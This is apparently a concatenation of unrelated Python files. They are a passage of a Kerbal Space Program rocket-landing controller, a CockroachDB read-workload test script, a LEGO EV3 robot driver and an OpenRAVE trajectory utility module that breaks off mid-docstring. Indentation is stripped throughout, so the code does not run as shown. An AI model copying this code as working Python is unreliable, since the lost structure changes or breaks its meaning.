def sample_index(index, rk, vk, qk, uk):
#if index >= N-1:
if index >= K-1:
return (rk[:, K-1], vk[:, K-1], qk[:, K-1], uk[:, K-1])
#return (v3(0,0,0), v3(0,0,0), v3( 9.807,0,0))
elif index <= 0:
i = 0
frac = index
else:
i = math.floor(index)
frac = index - i
r_i_s = lerp(rk[:, i], rk[:, i+1], frac)
v_i_s = lerp(vk[:, i], vk[:, i+1], frac)
q_i_s = lerp(qk[:, i], qk[:, i+1], frac)
u_i_s = lerp(uk[:, i], uk[:, i+1], frac)
if index < 0:
u_i_s = uk[:, 1].copy()
#print('u1234 ' + str(u[:, 0:4]))
#print('u_i_s ' + str(u[:, 1]))
return (r_i_s.copy(), v_i_s.copy(), q_i_s.copy(), u_i_s.copy())
def conic_clamp(target_a, min_mag, max_mag, max_tilt):
a_mag = npl.norm(target_a)
hor_dir = v3(0, target_a[1], target_a[2])
hor_dir /= npl.norm(hor_dir)
#target_direction = target_a / a_mag
a_hor = npl.norm(target_a[1:3])
a_ver = target_a[0]
if (a_hor < min_mag * math.sin(max_tilt)):
a_ver_min = math.sqrt(min_mag**2 - a_hor**2)
else:
a_ver_min = math.cos(max_tilt) * min_mag
if (a_hor < max_mag * math.sin(max_tilt)):
a_ver_max = math.sqrt(max_mag**2 - a_hor**2)
else:
a_ver_max = math.cos(max_tilt) * max_mag
a_ver = clamp(a_ver, a_ver_max, a_ver_min)
a_hor = min(a_hor, a_ver * math.tan(max_tilt))
return hor_dir * a_hor + v3(a_ver, 0, 0)
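# conic_clamp keeps a commanded acceleration inside a cone of half-angle max_tilt
# around the vertical (+x) axis and clamps its magnitude into [min_mag, max_mag]:
# the vertical component is bounded first, then the horizontal component is cut
# down to at most tan(max_tilt) times the vertical component.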
def solve_path(vessel_profile, vessel_state, vessel_final_state):
global solved_path, n_i
print('----------vessel_profile(original)------------')
for k in (vessel_profile.__dict__):
print('-- %s: \n%s' % (k, vessel_profile.__dict__[k]))
print('----------vessel_state(original)------------')
for k in (vessel_state.__dict__):
print('-- %s: \n%s' % (k, vessel_state.__dict__[k]))
print('----------vessel_final_state(original)------------')
for k in (vessel_final_state.__dict__):
print('-- %s: \n%s' % (k, vessel_final_state.__dict__[k]))
solver_options = SC_params.SolverOptions()
solver_options.w_delta = lambda i:(1e-3 * (2 ** i))
#solver_options.w_nu = 1e5
print('---------solving----------')
solved_path = solver.solve(vessel_profile, vessel_state, vessel_final_state,
solver_options=solver_options, use_c=True, verbose=True)
if solved_path != None:
(x, u, tf) = solved_path
qw, qx, qy, qz = x[7:11, :]
x[7:11, :] = vec(qx, qy, qz, qw) # wxyz to xyzw
n_i = -100
solved_path = (x, u, tf)
# print('x slice')
# print(x[:, 0:3])
# print('u slice')
# print(u[:, 0:3])
print('---------solve done----------')
if debug_lines:
update_lines(x, u)
else:
print('---------solve error----------')
print('---------loop start-------------')
combine_flaps(0, 0)
while True:
time.sleep(delta_time)
real_time = time.time() - start_time
ut = space_center.ut
game_delta_time = ut - game_prev_time
if game_delta_time < 0.01: # less than one in-game physics frame has elapsed, so skip this iteration
continue
# gather data used later in this iteration
vessel_d = {}
error = vessel_d['error'] = vec(vessel.position(ref_target)) # position error in the target frame
avel = vessel_d['avel'] = vec(vessel.angular_velocity(ref_surface)) # angular velocity in the surface frame (equals the target-frame angular velocity)
vel = vessel_d['vel'] = vec(vessel.velocity(ref_target)) # velocity relative to the ground
rotation_local2srf = rotation_mat(vec(vessel.rotation(ref_surface))) # rotation matrix from body frame to surface frame
rotation_srf2local = npl.inv(rotation_local2srf) # rotation matrix from surface frame to body frame
moment_of_inertia_local = vec(vessel.moment_of_inertia) # moment of inertia
mass = vessel_d['mass'] = vessel.mass
max_thrust = vessel_d['max_thrust'] = vessel.available_thrust
acceleration = vessel_d['acceleration'] = (vel - prev_vel) / game_delta_time
#print(game_delta_time)
if nav_mode == 'launch': # hop up to a set altitude
balanced_thr = mass * g0 / max_thrust
target_direction = v3(1, 0.02, 0) # tilt slightly north
#print(target_direction)
vessel.control.throttle = balanced_thr + (params['hop_vel'] - npl.norm(vel)) * 0.05
#print(error[0])
if (error[0] > params['hop_altitude']):
nav_mode = 'transit'
print('transit')
elif nav_mode == 'transit': # reduce thrust until the vertical velocity goes negative
balanced_thr = mass * g0 / max_thrust
target_direction = v3(1, 0, 0)
vessel.control.throttle = balanced_thr * 0.25
if (vel[0] < -10):
vessel.control.rcs = False
vessel.control.pitch = -1
time.sleep(1) # hold for one second
vessel.control.pitch = 0
vessel.control.throttle = 0
nav_mode = 'fall'
print('fall')
elif nav_mode == 'fall': # falling phase: attitude controlled by the flaps
pitch_target = clamp(ctrl_fall_distance.update((math.sqrt(error[2]**2 + error[1]**2) - params['ctrl_fall_distance_target']) / 200., game_delta_time), -1, 1) * 15
pitch_error = (flight.pitch - pitch_target) * deg2rad
hdg_target = math.atan2(-error[2], -error[1]) * rad2deg
hdg_error = norm_deg(flight.heading - hdg_target) * deg2rad
#print(ctrl_fall_pitch.integral, math.sqrt(error[2]**2 + error[1]**2))
if (abs(pitch_error) < 0.3):
ctrl_fall_pitch.ki = params['ctrl_fall_pitch.ki']
pitch_flap = ctrl_fall_pitch.update(pitch_error, game_delta_time)
yaw_flap = ctrl_fall_yaw.update(hdg_error, game_delta_time)
combine_flaps(pitch_flap, yaw_flap) #+0.1trim
if error[0] < params['start_altitude']: # start planning the descent trajectory
#frcount -= 1
if frcount <= 0:
frcount = 1
vessel_profile = get_vessel_profile(vessel)
vessel_state = predict_vessel_state(vessel, params['predict_altitude']) # solving takes time, so feed in an extrapolated future state
vessel_final_state = get_final_state(vessel, params['final_height'])
conn.krpc.paused = True # pause the game while solving
#Thread(target=solve_path, args=(vessel_profile, vessel_state)).start()
solve_path(vessel_profile, vessel_state, vessel_final_state)
conn.krpc.paused = False
if (error[0] <= params['predict_altitude'] and solved_path != None):
n_i = 0
vessel.control.sas = False
vessel.control.rcs = True
nav_mode = 'convex'
retract_flaps()
print('convex')
elif nav_mode == 'convex': # follow the solved trajectory
(x, uk, tf) = solved_path
mk = x[0, :] #mass
rk = x[1:4, :] # position
vk = x[4:7, :] # vel
qk = x[7:11, :] # quaternion
wk = x[11:14, :] # omega
di = game_delta_time * K/tf
n_i = clamp(find_nearest_index(rk, vk, error), n_i + di * 0.5, n_i + di * 1.5)
#n_i = max(n_i - game_delta_time * 0.2 * K/tf, find_nearest_index(rk, vk, error)) # find the nearest point on the trajectory
#print(game_delta_time)
(r_i, v_i, q_i, u_i) = sample_index(n_i, rk, vk, qk, uk) # planned position and velocity
(r_i_, v_i_, q_i_, u_i_) = sample_index(n_i + 0.4 * K/tf, rk, vk, qk, uk) # sample a short time ahead
q_i_mat = rotation_mat(q_i)
q_i_mat_ = rotation_mat(q_i_)
u_i = transform(u_i, q_i_mat)
u_i_ = transform(u_i_, q_i_mat_)
head_i = transform(vec(1, 0, 0), q_i_mat)
head_i_ = transform(vec(1, 0, 0), q_i_mat_)
#v_i_dir = v_i / npl.norm(v_i)
# target_a = u_i_
# target_v = v_i_
# target_x = r_i # + np.dot((error - r_i), v_i_dir) * v_i_dir
# #print(n_i, target_a, target_v, target_x)
# target_a += (target_v - vel) * k_v + (target_x - error) * k_x
# target_a = u_i + (v_i - vel) * k_v + (r_i - error) * k_x
# target_a_ = u_i_ + (v_i_ - vel) * k_v + (r_i - error) * k_x
target_a = npl.norm(u_i) / mass * head_i + (v_i - vel) * k_v + (r_i - error) * k_x
target_a_ = npl.norm(u_i_) / mass * head_i_ + (v_i - vel) * k_v + (r_i - error) * k_x
if debug_lines:
target_line.start = error
target_line.end = (r_i[0], r_i[1], r_i[2])
target2_line.start = error
target2_line.end = (r_i_[0], r_i_[1], r_i_[2])
max_throttle_ctrl = throttle_limit_ctrl[1] * (max_thrust / mass)
min_throttle_ctrl = throttle_limit_ctrl[0] * (max_thrust / mass)
target_a = transform(target_a, q_i_mat.T)
target_a = conic_clamp(target_a, min_throttle_ctrl, max_throttle_ctrl, max_tilt_off)
target_a = transform(target_a, q_i_mat)
target_a_ = transform(target_a_, q_i_mat_.T)
target_a_ = conic_clamp(target_a_, min_throttle_ctrl, max_throttle_ctrl, max_tilt_off)
target_a_ = transform(target_a_, q_i_mat_)
# if n_i < 0 :
# target_a = np.array([g0, 0, 0]) + u_i
#target_direction = target_a_ / npl.norm(target_a_)
#target_throttle = npl.norm(target_a) / (max_thrust / mass)
target_direction = target_a_ / npl.norm(target_a_)
target_throttle = npl.norm(target_a) / (max_thrust / mass)
#print(target_a)
if debug_lines:
head_line.start = error
head_line.end = error + target_direction * 8
if n_i > 0:
vessel.control.throttle = target_throttle
if (K - n_i) * tf / K < 6:
vessel.control.gear = True
if npl.norm(error[1:3]) < params['final_radius'] and npl.norm(error[0]) < params['final_height']:
vessel.control.gear = not vessel.control.gear
engine_gimbal.set_field_float('Gimbal Limit', 30) # prevent oscillation
print('final')
nav_mode = 'final'
elif nav_mode == 'final':
max_acc = throttle_limit_ctrl[1] * (max_thrust / mass) - g0
max_acc_low = throttle_limit_ctrl[1] * final_throttle * (max_thrust / mass) - g0
est_h = error[0] - vel[0]**2 / (2 * max_acc)
est_h_low = error[0] - vel[0]**2 / (2 * max_acc_low)
est_h_center = (est_h + est_h_low) / 2
vessel.control.throttle = clamp(lerp(throttle_limit_ctrl[1] * final_throttle, throttle_limit_ctrl[1], -est_h_low / (est_h - est_h_low) * (1+final_kp)), throttle_limit_ctrl[1], throttle_limit_ctrl[0])
error_hor = v3(0, error[1], error[2])
vel_hor = v3(0, vel[1], vel[2])
ctrl_hor = -error_hor * 0.03 - vel_hor * 0.06
target_direction = ctrl_hor + v3(1, 0, 0)
target_direction /= npl.norm(target_direction)
target_direction = conic_clamp(target_direction, 1, 1, max_tilt)
else:
nav_mode = 'launch'
if (max_thrust == 0):
vessel.control.activate_next_stage()
vessel.control.rcs = True
vessel.control.gear = not vessel.control.gear
continue
#target_direction = -vel
#vessel.control.throttle = 0
# transform into the body frame for attitude control; x/y/z below refer to body axes
if nav_mode in ['final', 'convex', 'launch', 'transit']:
target_direction_local = transform(target_direction, rotation_srf2local) # target pointing direction expressed in the body frame
avel_local = transform(avel, rotation_srf2local) # angular velocity in the body frame
# maximum angular acceleration available about each axis
#authority_local = (torque + torque_k * vessel.control.throttle) / moment_of_inertia_local
#authority_local = np.abs(vec(vessel.available_torque[0])) / moment_of_inertia_local
#ctrl_x_rot.unified_authority = authority_local[0]
#ctrl_z_rot.unified_authority = authority_local[2]
# PID control; roll simply damps its angular velocity
#control_pitch = -clamp(ctrl_x_rot.update(angle_around_axis(target_direction_local, v3(0, 1, 0), v3(1, 0, 0)), avel_local[0]), 1, -1)
#control_yaw = -clamp(ctrl_z_rot.update(angle_around_axis(target_direction_local, v3(0, 1, 0), v3(0, 0, 1)), avel_local[2]), 1, -1)
control_pitch = -clamp(ctrl_x_rot.update(angle_around_axis(target_direction_local, v3(0, 1, 0), v3(1, 0, 0)), game_delta_time), 1, -1)
control_yaw = -clamp(ctrl_z_rot.update(angle_around_axis(target_direction_local, v3(0, 1, 0), v3(0, 0, 1)), game_delta_time), 1, -1)
control_roll = clamp(avel_local[1] * ctrl_y_avel_kp, 1, -1)
vessel.control.pitch = control_pitch
vessel.control.yaw = control_yaw
vessel.control.roll = control_roll
# termination condition
if nav_mode == 'final':
if (npl.norm(error[1:3]) < 3 and npl.norm(error[0]) < 1 and npl.norm(vel[1:3]) < 0.3 and npl.norm(vel[0]) < 0.5 and npl.norm(avel) < 0.2) or (vel[0] > 0 and npl.norm(error[0]) < 1):
print('exit')
vessel.control.throttle = 0
break
prev_vel = vel
game_prev_time = ut
|
cockroach_workload_read.py
|
#!/usr/bin/env python
import os
import sys
import shutil
import time
import psycopg2
import subprocess
import multiprocessing
CURR_DIR=os.path.dirname(os.path.realpath(__file__))
server_dirs = []
server_logs = []
log_dir = None
assert len(sys.argv) >= 4
for i in range(1, 4):
server_dirs.append(sys.argv[i])
def invoke_cmd(cmd):
p = subprocess.Popen(cmd, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
out, err = p.communicate()
return (out, err)
#if logdir specified
if len(sys.argv) == 5:
log_dir = sys.argv[-1]
for i in range(0, 3):
server_logs.append(os.path.join(log_dir, 'log-'+ str(i)))
os.system('rm -rf '+ os.path.join(log_dir, 'log-'+ str(i)))
os.system('mkdir '+ os.path.join(log_dir, 'log-'+ str(i)))
else:
for i in range(0, 3):
server_logs.append(os.path.join(CURR_DIR, 'log-'+ str(i)))
os.system('rm -rf '+ os.path.join(CURR_DIR, 'log-'+ str(i)))
os.system('mkdir '+ os.path.join(CURR_DIR, 'log-'+ str(i)))
os.system('killall cockroach')
os.system('killall cockroach')
os.system('killall cockroach')
time.sleep(3)
COCKROACH_HOME='/mnt/data1/scratch/work/adsl-work/d2s/applications/cockroach/cockroach-beta-20160714.linux-amd64'
os.system('%s/cockroach start --store=%s --log-dir=%s &'%(COCKROACH_HOME, server_dirs[0], server_logs[0]))
os.system('%s/cockroach start --store=%s --log-dir=%s --port=26258 --http-port=8081 --join=localhost:26257 --join=localhost:26259 &'%(COCKROACH_HOME, server_dirs[1], server_logs[1]))
os.system('%s/cockroach start --store=%s --log-dir=%s --port=26259 --http-port=8082 --join=localhost:26257 --join=localhost:26258 &'%(COCKROACH_HOME, server_dirs[2], server_logs[2]))
time.sleep(2)
def logger_log(log_dir, msg):
if log_dir is not None:
assert os.path.isdir(log_dir) and os.path.exists(log_dir)
client_log_file = os.path.join(log_dir, 'log-client')
with open(client_log_file, 'a') as f:
f.write(msg)
else:
print(msg.replace('\n', ';'))
before_status = [False, False, False]
logger_log(log_dir, 'Before workload\n')
out, err = invoke_cmd('ps aux | grep cockroach-beta-20160714.linux-amd64')
print(out, err)
to_write = ''
out = out.split('\n')
out = [i for i in out if i is not None and len(i) > 0 and ('workload_dir0' in i or 'workload_dir1' in i or 'workload_dir2' in i)]
to_check = ['workload_dir0', 'workload_dir1', 'workload_dir2']
j = 0
for check in to_check:
found = False
for i in out:
if check in i:
found = True
to_write += check.replace('workload_dir', 'node') + ' running:' + str(found) + '\n'
before_status[j] = found
j += 1
logger_log(log_dir, to_write)
logger_log(log_dir, '----------------------------------------------\n')
def do_work(server_id, port):
inited_value = 'a' * 8192
retry = 0
while(retry < 3):
try:
logger_log(log_dir, 'Connecting to ' + str(server_id) + ' at port:' + str(port) + '\n')
conn = psycopg2.connect(host="localhost", port=port, database = "mydb", user="root", connect_timeout=5)
logger_log(log_dir, 'Connected to ' + str(server_id)+ '\n')
conn.set_session(autocommit=True)
cur = conn.cursor()
cur.execute("SELECT * FROM mytable;")
logger_log(log_dir, 'Executed on ' + str(server_id)+ '\n')
result = []
for record in cur:
result.append(record)
logger_log(log_dir, 'Server:' + str(server_id) + ' Record count:' + str(len(result)) + '\n')
for r in result:
logger_log(log_dir, 'Server:' + str(server_id) + ' Correct value present:' + str(len(r) == 2 and r[0] == 1 and inited_value == str(r[1])) + '\n')
if not (len(r) == 2 and r[0] == 1 and inited_value == str(r[1])):
logger_log(log_dir, 'Server:' + str(server_id) + ' Value returned:' + str(r) + '\n')
cur.close()
conn.close()
break #if executed successfully just break
except Exception as e:
retry += 1
logger_log(log_dir, 'Server:' + str(server_id) + ' Exception:' + str(e) + '\n')
time.sleep(1)
server_ports = ["26257", "26258", "26259"]
for i in range(0, len(server_ports)):
if before_status[i] == True:
high_level_retry = 0
while high_level_retry <= 1:
p = multiprocessing.Process(target=do_work, args=(i, server_ports[i],))
p.start()
p.join(25)
if p.is_alive():
p.terminate()
p.join()
logger_log(log_dir, 'HLT: '+ str(high_level_retry) +' Worker thread for server:'+ str(i)+ ' killed after 25 seconds!\n')
high_level_retry += 1
else:
break
else:
logger_log(log_dir, 'Server ' + str(i) + ' is not running. So will not connect.\n')
logger_log(log_dir, '----------------------------------------------\n')
logger_log(log_dir, 'After workload\n')
out, err = invoke_cmd('ps aux | grep cockroach-beta-20160714.linux-amd64')
to_write = ''
out = out.split('\n')
out = [i for i in out if i is not None and len(i) > 0 and ('workload_dir0' in i or 'workload_dir1' in i or 'workload_dir2' in i)]
to_check = ['workload_dir0', 'workload_dir1', 'workload_dir2']
for check in to_check:
found = False
for i in out:
if check in i:
found = True
to_write += check.replace('workload_dir', 'node') + ' running:' + str(found) + '\n'
logger_log(log_dir, to_write)
os.system('killall cockroach')
os.system('killall cockroach')
os.system('killall cockroach')
time.sleep(1)
|
main.py
|
#!/usr/bin/env pybricks-micropython
import struct, threading
from pybricks import ev3brick as brick
from pybricks.ev3devices import (
Motor,
TouchSensor,
ColorSensor,
InfraredSensor,
UltrasonicSensor,
GyroSensor,
)
from pybricks.parameters import (
Port,
Stop,
Direction,
Button,
Color,
SoundFile,
ImageFile,
Align,
)
from pybricks.tools import print, wait, StopWatch
from pybricks.robotics import DriveBase
from devices import detectJoystick
class Robot:
def __init__(self):
self.motor = Motor(Port.B)
self.ultrasonic = UltrasonicSensor(Port.S4)
self.active = True
self.speed = 0
self.colors = [None, Color.GREEN, Color.YELLOW, Color.RED]
def setSpeed(self, acc):
if acc < 0:
self.speed = max(-3, self.speed - 1)
elif acc > 0:
self.speed = min(3, self.speed + 1)
else:
self.speed = 0
if self.speed != 0:
self.motor.run(self.speed * 90)
else:
self.motor.stop()
brick.light(self.colors[abs(self.speed)])
def inactive(self):
self.active = False
self.setSpeed(0)
brick.sound.beep()
def autoStopLoop(robot):
while robot.active:
if robot.speed > 0 and robot.ultrasonic.distance() < 200:
robot.setSpeed(0)
wait(100)
def joystickLoop(robot, eventFile):
FORMAT = "llHHI"
EVENT_SIZE = struct.calcsize(FORMAT)
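# "llHHI" matches the Linux input_event layout: two longs for the timestamp
# (tv_sec, tv_usec), two unsigned shorts for the event type and code, and a
# 32-bit value.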
with open(eventFile, "rb") as infile:
while True:
event = infile.read(EVENT_SIZE)
_, _, t, c, v = struct.unpack(FORMAT, event)
# button A, B:
if t == 1 and v == 1:
if c == 305:
# press A:
robot.setSpeed(1)
elif c == 304:
# press B:
robot.setSpeed(-1)
elif c == 307:
# press X:
return robot.inactive()
elif t == 3:
if c == 1:
# Left stick & vertical:
speed = 0
if v < 32768:
# up:
speed = 1
elif v > 32768:
# down:
speed = -1
robot.setSpeed(speed)
def buttonLoop(robot):
while True:
if not any(brick.buttons()):
wait(10)
else:
if Button.LEFT in brick.buttons():
robot.setSpeed(-1)
elif Button.RIGHT in brick.buttons():
robot.setSpeed(1)
elif Button.CENTER in brick.buttons():
robot.setSpeed(0)
elif Button.UP in brick.buttons():
return robot.inactive()
wait(500)
def main():
brick.sound.beep()
joystickEvent = detectJoystick(["Controller"])
robot = Robot()
t = threading.Thread(target=autoStopLoop, args=(robot,))
t.start()
if joystickEvent:
joystickLoop(robot, joystickEvent)
else:
buttonLoop(robot)
main()
|
util.py
|
#!/usr/bin/env python
# Copyright (c) 2013, Carnegie Mellon University
# All rights reserved.
# Authors: Michael Koval <mkoval@cs.cmu.edu>
# Authors: Siddhartha Srinivasa <siddh@cs.cmu.edu>
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# - Redistributions of source code must retain the above copyright notice, this
# list of conditions and the following disclaimer.
# - Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation
# and/or other materials provided with the distribution.
# - Neither the name of Carnegie Mellon University nor the names of its
# contributors may be used to endorse or promote products derived from this
# software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
# ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE
# LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
# SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
# CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
import logging
import math
import numpy
import openravepy
import scipy.misc
import scipy.optimize
import threading
import time
import warnings
logger = logging.getLogger(__name__)
def create_sensor(env, args, anonymous=True):
sensor = openravepy.RaveCreateSensor(env, args)
if sensor is None:
raise Exception("Creating '%s' sensor failed." % args.split()[0])
env.Add(sensor, anonymous)
return sensor
def CreatePlannerParametersString(options, params=None,
remove_postprocessing=True):
""" Creates an OpenRAVE parameter XML string.
OpenRAVE planners have an InitPlan function that either take an instance of
the PlannerParameters() struct or the serialized XML version of this
struct. Unfortunately, it is not possible to override several default
options in the Python API. This function takes a seed PlannerParameters
struct and a dictionary of key-value pairs to override. It returns XML that
can be passed directly to InitPlan.
@param options: dictionary of key-value pairs
@type options: {str: str}
@param params: input struct (defaults to the defaults in OpenRAVE)
@type params: openravepy.Planner.PlannerParameters
@return planner parameters string XML
@rtype str
"""
import lxml.etree
import openravepy
from copy import deepcopy
options = deepcopy(options)
if remove_postprocessing:
options['_postprocessing'] = None
if params is None:
params = openravepy.Planner.PlannerParameters()
params_xml = lxml.etree.fromstring(params.__repr__().split('"""')[1])
for key, value in options.iteritems():
element = params_xml.find(key)
# Remove a value if "value" is None.
if value is None:
if element is not None:
params_xml.remove(element)
# Add (or overwrite) an existing value.
else:
if element is None:
element = lxml.etree.SubElement(params_xml, key)
element.text = str(value)
if remove_postprocessing:
params_xml.append(
lxml.etree.fromstring("""
<_postprocessing planner="">
<_nmaxiterations>20</_nmaxiterations>
<_postprocessing planner="parabolicsmoother">
<_nmaxiterations>100</_nmaxiterations>
</_postprocessing>
</_postprocessing>
""")
)
return lxml.etree.tostring(params_xml)
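# Example usage (a sketch; the option values are hypothetical):
#
#   params_str = CreatePlannerParametersString({'_nmaxiterations': '40'})
#   planner = openravepy.RaveCreatePlanner(env, 'birrt')
#   planner.InitPlan(robot, params_str)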
def HasGroup(cspec, group_name):
try:
cspec.GetGroupFromName(group_name)
return True
except openravepy.openrave_exception:
return False
def HasAffineDOFs(cspec):
return (HasGroup(cspec, 'affine_transform') or
HasGroup(cspec, 'affine_velocities') or
HasGroup(cspec, 'affine_accelerations'))
def HasJointDOFs(cspec):
return (HasGroup(cspec, 'joint_values') or
HasGroup(cspec, 'joint_velocities') or
HasGroup(cspec, 'joint_accelerations') or
HasGroup(cspec, 'joint_torques'))
def GetTrajectoryIndices(traj):
try:
cspec = traj.GetConfigurationSpecification()
joint_values_group = cspec.GetGroupFromName('joint_values')
return numpy.array([int(index) for index in
joint_values_group.name.split()[2:]])
except openravepy.openrave_exception:
return list()
def WaitForControllers(controllers, timeout=None, rate=20):
running_controllers = set(controllers)
start_time = time.time()
timestep = 1.0 / rate
while running_controllers:
# Check for a timeout.
now_time = time.time()
if timeout is not None and now_time - start_time > timeout:
return False
# Check if the trajectory is done.
done_controllers = set()
for controller in running_controllers:
if controller.IsDone():
done_controllers.add(controller)
running_controllers -= done_controllers
time.sleep(timestep)
return True
def SetCameraFromXML(viewer, xml):
if isinstance(viewer, openravepy.Environment):
viewer = viewer.GetViewer()
import lxml.etree
from StringIO import StringIO
padded_xml = '<bogus>{0:s}</bogus>'.format(xml)
camera_xml = lxml.etree.parse(StringIO(padded_xml))
translation_raw = camera_xml.find('//camtrans').text
axis_raw = camera_xml.find('//camrotationaxis').text
focal_raw = camera_xml.find('//camfocal').text
translation = numpy.loadtxt(StringIO(translation_raw))
axis_angle = numpy.loadtxt(StringIO(axis_raw))
axis_angle = axis_angle[3] * axis_angle[0:3] * (numpy.pi / 180)
focal = float(focal_raw)
transform = openravepy.matrixFromAxisAngle(axis_angle)
transform[0:3, 3] = translation
viewer.SetCamera(transform, focal)
def TakeSnapshot(viewer, path=None, show_figures=True,
width=1920, height=1080, fx=640, fy=640):
if isinstance(viewer, openravepy.Environment):
viewer = viewer.GetViewer()
viewer.SendCommand('SetFiguresInCamera {0:d}'.format(show_figures))
image = viewer.GetCameraImage(width, height, viewer.GetCameraTransform(),
[fx, fy, width / 2, height / 2])
if path is not None:
scipy.misc.imsave(path, image)
return image
def ComputeAinv(N, dof):
dt = 1.0 / (N - 1)
K = numpy.mat(numpy.zeros((N - 1, N - 1)))
for i in range(1, N - 1):
K[i, i] = 1 / dt
K[i, i - 1] = -1 / dt
K[0, 0] = 1 / dt
A = K.transpose() * K
invA_small = numpy.linalg.inv(A)
# Tensorize.
invA = numpy.mat(numpy.zeros([(N) * dof, (N) * dof]))
for i in range(1, N):
for j in range(1, N):
for k in range(dof):
invA[i * dof + k, j * dof + k] = invA_small[i - 1, j - 1]
return invA
def NormalizeVector(vec):
"""
Normalize a vector.
This is faster than doing: vec/numpy.linalg.norm(vec)
@param numpy.array vec: A 1-dimensional vector.
@returns numpy.array result: A vector of the same size, where the
L2 norm of the elements equals 1.
"""
numpy.seterr(divide='ignore', invalid='ignore')
magnitude = numpy.sqrt(vec.dot(vec))
vec2 = (vec / magnitude)
return numpy.nan_to_num(vec2) # convert NaN to zero
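# Illustrative example: a 3-4-5 right triangle scales to a unit vector.
#   NormalizeVector(numpy.array([3.0, 4.0]))   # -> array([ 0.6,  0.8])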
def MatrixToTraj(traj_matrix, cs, dof, robot):
env = robot.GetEnv()
traj = openravepy.RaveCreateTrajectory(env, '')
traj.Init(cs)
for i in range(numpy.size(traj_matrix) / dof):
tp = traj_matrix[range(i * dof, i * dof + dof)]
tp = numpy.array(tp.transpose())[0]
traj.Insert(i, tp)
openravepy.planningutils.RetimeActiveDOFTrajectory(
traj, robot, False, 0.2, 0.2, "LinearTrajectoryRetimer", "")
return traj
def TrajToMatrix(traj, dof):
traj_matrix = numpy.zeros(dof * (traj.GetNumWaypoints()))
traj_matrix = numpy.mat(traj_matrix).transpose()
for i in range(traj.GetNumWaypoints()):
d = traj.GetWaypoint(i)[range(dof)]
d = numpy.mat(d).transpose()
traj_matrix[range(i * dof, (i + 1) * dof)] = d
return traj_matrix
def AdaptTrajectory(traj, new_start, new_goal, robot):
"""
Adapt an existing trajectory to move between a new start and goal.
The trajectory's configuration specification must contain exactly one group
called "joint_values". Note that this does NOT collision check the warped
trajectory.
@param traj input trajectory
@param new_start new starting configuration
@param new_goal new goal configuration
@param robot
@return adapted trajectory
"""
# TODO: check joint limits
# TODO: support arbitrary trajectory types
# TODO: collision check the warped trajectory
# TODO: this should not require a robot as a parameter
cs = traj.GetConfigurationSpecification()
dof = cs.GetDOF()
start = traj.GetWaypoint(0)
start = start[range(dof)]
goal = traj.GetWaypoint(traj.GetNumWaypoints() - 1)
goal = goal[range(dof)]
traj_matrix = TrajToMatrix(traj, dof)
# Translate trajectory to match start point.
diff_start = new_start - start
diff_start = numpy.mat(diff_start).transpose()
translated_traj = numpy.zeros(dof * (traj.GetNumWaypoints()))
translated_traj = numpy.mat(translated_traj).transpose()
for i in range(traj.GetNumWaypoints()):
translated_traj[range((i - 1) * dof, i * dof)] = \
traj_matrix[range((i - 1) * dof, i * dof)] - diff_start
# Apply correction to reach goal point.
new_traj_matrix = translated_traj
N = traj.GetNumWaypoints()
goal_translated = new_traj_matrix[range((N - 1) * dof, (N) * dof)]
Ainv = ComputeAinv(N, dof)
goal_diff = numpy.mat(new_goal).transpose() - goal_translated
traj_diff = numpy.zeros(dof * (N))
traj_diff = numpy.mat(traj_diff).transpose()
traj_diff[range((N - 1) * dof, (N) * dof)] = goal_diff
new_traj_matrix += Ainv * traj_diff / Ainv[N * dof - 1, N * dof - 1]
new_traj = MatrixToTraj(new_traj_matrix, cs, dof, robot)
return new_traj
def CopyTrajectory(traj, env=None):
"""
Create a new copy of a trajectory using its Clone() operator.
@param traj input trajectory
@param env optional environment used to initialize a trajectory
@return copy of the trajectory
"""
copy_traj = openravepy.RaveCreateTrajectory(env or traj.GetEnv(),
traj.GetXMLId())
copy_traj.Clone(traj, 0)
copy_traj.SetDescription(traj.GetDescription())
return copy_traj
def GetTrajectoryTags(traj):
"""
Read key/value pairs from a trajectory.
    The metadata can be set by SetTrajectoryTags; see that function for
details. If no metadata is set, this function returns an empty dictionary.
@param traj input trajectory
@return dictionary of string key/value pairs
"""
import json
description = traj.GetDescription()
if description == '':
return dict()
else:
try:
return json.loads(description)
except ValueError as e:
logger.warning('Failed reading tags from trajectory: %s',
e.message)
return dict()
def SetTrajectoryTags(traj, tags, append=False):
"""
Tag a trajectory with a dictionary of key/value pairs.
If append = True, then the dictionary of tags is added to any existing tags
on the trajectory. Otherwise, all existing tags will be replaced. This
metadata can be accessed by GetTrajectoryTags. Currently, the metadata is
stored as JSON in the trajectory's description.
@param traj input trajectory
@param append if true, retain existing tags on the trajectory
"""
import json
if append:
all_tags = GetTrajectoryTags(traj)
all_tags.update(tags)
else:
all_tags = tags
traj.SetDescription(json.dumps(all_tags))
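# Illustrative use (a sketch; `traj` is any OpenRAVE trajectory):
#   SetTrajectoryTags(traj, {'smoothed': True}, append=True)
#   GetTrajectoryTags(traj)   # -> {'smoothed': True, ...any existing tags}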
def SimplifyTrajectory(traj, robot):
"""
Re-interpolate trajectory as minimal set of linear segments.
This function attempts to extract linear segments from the given
    trajectory by iteratively adding extrema waypoints to a set of linear
    segments until all of the original trajectory waypoints are within the
    robot's joint resolutions of the interpolated segments.
Currently, only untimed trajectories are supported!
@param robot the robot that should be used for the interpolation
